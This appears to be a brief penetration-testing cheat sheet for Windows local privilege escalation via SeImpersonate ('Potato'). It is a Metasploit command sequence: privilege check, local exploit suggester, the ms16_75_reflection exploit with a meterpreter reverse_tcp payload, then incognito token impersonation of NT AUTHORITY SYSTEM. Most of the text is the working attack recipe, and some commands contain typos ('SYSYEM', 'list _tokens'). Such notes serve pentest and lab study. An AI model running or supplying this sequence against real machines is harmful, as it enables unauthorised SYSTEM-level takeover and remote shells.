Potato and SeImpersonate

Whoami /priv - if user or more likely service account can impersonate

run post/multi/recon/local_exploit_suggester

background

use exploit/windows/local/ms16_75_reflection

set lhost

set lport

set session #

set payload windows/meterpreter/reverse_tcp

load incognito

list _tokens -u

copy "NT AUTHORITY\SYSYEM"

impersonate_token "NT AUTHORITY\SYSYEM"